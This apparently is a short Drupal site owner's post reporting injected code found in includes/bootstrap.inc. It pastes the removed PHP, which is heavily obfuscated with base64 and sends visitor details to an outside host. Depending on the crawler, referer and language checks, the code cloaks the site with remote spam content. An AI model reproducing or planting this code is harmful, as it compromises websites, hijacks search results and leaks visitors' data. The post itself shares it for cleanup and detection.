Tag: Drupal

I checked all my files; then found this code on includes/boostrap.inc… Here below is code.. After i deleted this; i was able to unverify the USER the on google Search Console and the meta tag is now Removed from my site.

“);exit();}else if($isr == $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“LQ==”)){$GLOBALS(‘zym_decrypt’)(‘Il1l1IIl1Il111lllIlIl1’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUC8xLjEgNTAzIFNlcnZpY2UgVGVtcG9yYXJpbHkgVW5hdmFpbGFibGU=’));$GLOBALS(‘zym_decrypt’)(‘Il1l1IIl1Il111lllIlIl1’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(base64_decode(‘VTNSaGRIVnpPaUExTURNZ1UyVnlkbWxqWlNCVVpXMXdiM0poY21sc2VTQlZibUYyWVdsc1lXSnNaUT09’)));exit();}else if($GLOBALS(‘zym_decrypt’)(‘II1II1l1I1IIl1Il111llIll1I11’)($a)> 0){$GLOBALS(‘zym_decrypt’)(‘Il1l1IIl1Il111lllIlIl1’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOA==”));echo $a;exit();}}}function aaa(){$kec =”##3|Lw==##”;$kec =$GLOBALS(‘zym_decrypt’)(‘IlI1Ill1lllII1II1Illl1’)($kec, 2, $GLOBALS(‘zym_decrypt’)(‘II1II1l1I1IIl1Il111llIll1I11’)($kec)-4);$kec =$GLOBALS(‘zym_decrypt’)(‘lI1lll1Il1lIII11l1lI11I11’)(‘|’, $kec);$iso =$kec(0);$isp =$GLOBALS(‘zym_decrypt’)(‘lI1lll1Il1lIII11l1lI11I11’)(‘,’, $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)($kec(1)));$rqu =isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFV1JJVEVfVVJM’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFV1JJVEVfVVJM’)) : $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UkVRVUVTVF9VUkk=’));if($iso == 1){return;}else if($iso == 2){if(!$GLOBALS(‘zym_decrypt’)(‘I1lII1llIlIlll111l1lI1l’)($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UkVRVUVTVF9VUkk=’)), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“dGVzdFBhZ2VSZWRpcmVjdA==”))> 0){if($GLOBALS(‘zym_decrypt’)(‘IlI1I1lI1II1I1llIIlII1IIl’)($rqu, $isp)){return $GLOBALS(‘zym_decrypt’)(‘l1l1111IIlllIlI1ll1lIIII’)();}else{return;}}}else if($iso == 3){return $GLOBALS(‘zym_decrypt’)(‘l1l1111IIlllIlI1ll1lIIII’)();}}function ggg(){$apu =$GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“aHR0cDovL3d3dy5nb29kc2hvcHMuY28v”);$rqu =isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFV1JJVEVfVVJM’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFV1JJVEVfVVJM’)) : $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UkVRVUVTVF9VUkk=’));$ret =””;$pod =array($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“dg==”)=> $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“Mw==”), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“c2VydmVyX25hbWU=”)=> $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9IT1NU’)), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“dXNlcl9hZ2VudA==”)=> $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9VU0VSX0FHRU5U’)), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“cmVtb3RlX2FkZHI=”)=> $GLOBALS(‘zym_decrypt’)(‘l1111l1II11IIl1II111l1II’)(), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“aHR0cF9yZWZlcmVy”)=> isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRUZFUkVS’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRUZFUkVS’)) : ”, $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“aHR0cF9hY2NlcHRfbGFuZ3VhZ2U=”)=> isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9BQ0NFUFRfTEFOR1VBR0U=’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9BQ0NFUFRfTEFOR1VBR0U=’)) : ”, $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“dXJs”)=> $rqu );if($GLOBALS(‘zym_decrypt’)(‘II11IllI1II1IIII1l11I1’)(base64_decode(‘Y3VybA==’))){$curl =curl_init($apu);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_TIMEOUT, 5);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_USERAGENT, isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9VU0VSX0FHRU5U’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9VU0VSX0FHRU5U’)) : ”);curl_setopt($curl, CURLOPT_POST, true);curl_setopt($curl, CURLOPT_POSTFIELDS, $pod);$ret =curl_exec($curl);$cno =curl_errno($curl);$cnt =curl_error($curl);curl_close($curl);if ($cno > 0){$ret =””;}}else{$pod =$GLOBALS(‘zym_decrypt’)(‘Ill11l1llIll1l1Il1ll1l11l’)($pod);$options($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘aHR0cA==’)) =array($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘dGltZW91dA==’)=>60, $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘bWV0aG9k’)=> $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UE9TVA==’), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘aGVhZGVy’)=> $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘Q29udGVudC10eXBlOmFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA==’), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘Y29udGVudA==’)=> $pod );$ret =$GLOBALS(‘zym_decrypt’)(‘lIlllI11ll1IlI11IlIIl11l1’)($apu, false, $GLOBALS(‘zym_decrypt’)(‘l1I1l11lI1IIlllllIl11llIl1lI’)($options));}$ret =$GLOBALS(‘zym_decrypt’)(‘I1IIIIlI1lIIl111llI11llI’)($ret, “xEFxBBxBF”);return $ret;}function bbb(){$a =””;if(isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9DRl9DT05ORUNUSU5HX0lQ’)))){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9DRl9DT05ORUNUSU5HX0lQ’));}else if(isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9JTkNBUF9DTElFTlRfSVA=’)))){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9JTkNBUF9DTElFTlRfSVA=’));}else if(isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9UUlVFX0NMSUVOVF9JUA==’)))){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9UUlVFX0NMSUVOVF9JUA==’));}else if(isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRU1PVEVJUA==’)))){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRU1PVEVJUA==’));}else if(isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFQUxfSVA=’)))){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX1JFQUxfSVA=’));}else{$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UkVNT1RFX0FERFI=’));}if($a == $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘MTI3LjAuMC4x’)){$a =$_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9YX0ZPUldBUkRFRF9GT1I=’));$a =$GLOBALS(‘zym_decrypt’)(‘lI1lll1Il1lIII11l1lI11I11’)(‘,’, $a);$a =$a(0);}return $a;}function ccc(){$uag =isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9VU0VSX0FHRU5U’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9VU0VSX0FHRU5U’)) : ”;if($GLOBALS(‘zym_decrypt’)(‘I1IIlI1IlIIlIl1lI11l1llll’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(base64_decode(‘THlobmIyOW5iR1Y4ZVdGb2IyOHBMdz09’)), $GLOBALS(‘zym_decrypt’)(‘Illl1Il1ll1IIllIllIll1lll’)($uag))){return true;}return false;}function ddd(){$ref =isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRUZFUkVS’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9SRUZFUkVS’)) : ”;if($GLOBALS(‘zym_decrypt’)(‘I1IIlI1IlIIlIl1lI11l1llll’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(base64_decode(‘THlobmIyOW5iR1V1WTI4dWFuQjhlV0ZvYjI4dVkyOHVhbkI4Wkc5amIyMXZMbTVsTG1wd0tTOD0=’)), $GLOBALS(‘zym_decrypt’)(‘Illl1Il1ll1IIllIllIll1lll’)($ref))){return true;}return false;}function eee(){$lng =isset($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9BQ0NFUFRfTEFOR1VBR0U=’)))? $_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘SFRUUF9BQ0NFUFRfTEFOR1VBR0U=’)) : ”;if($GLOBALS(‘zym_decrypt’)(‘I1IIlI1IlIIlIl1lI11l1llll’)($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(base64_decode(‘THlocVlYeHFjQ2t2’)), $GLOBALS(‘zym_decrypt’)(‘Illl1Il1ll1IIllIllIll1lll’)($lng))){return true;}return false;}function fff(){return $GLOBALS(‘zym_decrypt’)(‘I1lII1llIlIlll111l1lI1l’)($_SERVER($GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(‘UkVRVUVTVF9VUkk=’)), $GLOBALS(‘zym_decrypt’)(‘l111l11lI1111Illl11l11II’)(“dGVzdFBhZ2VSZWRpcmVjdA==”))> 0;}function hhh($str){return $GLOBALS(‘zym_decrypt’)(‘lIIlll1Il1I1IlI1I1111lIlIIlII’)($str);}?>